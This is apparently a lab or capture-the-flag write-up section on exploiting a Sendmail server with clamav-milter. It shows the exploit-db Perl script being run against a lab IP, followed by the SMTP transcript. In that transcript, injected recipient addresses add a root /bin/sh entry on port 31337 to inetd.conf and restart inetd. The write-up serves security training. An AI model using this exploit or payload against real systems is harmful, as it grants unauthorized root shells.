Exploitation

The exploitation of ClamAV service was done through the enumeration of the SNMP Service using snmp-check.

Quick use of exploit.db

Sendmail with clamav-milter < 0.91.2 - Remote Command ExecutionExploit Database

perl /usr/share/exploitdb/exploits/multiple/remote/4761.pl 192.168.188.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.188.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Wed, 6 Jul 2022 04:35:40 -0400; (No UCE/UBE) logging access from: [192.168.49.188](FAIL)-[192.168.49.188]
250-localhost.localdomain Hello [192.168.49.188], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 2668ZeDI004544 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection

On line 18, we see the output of the exploit opened up a port on 31337 and it opened a shell as root.

PreviousSMTP

Last updated 3 years ago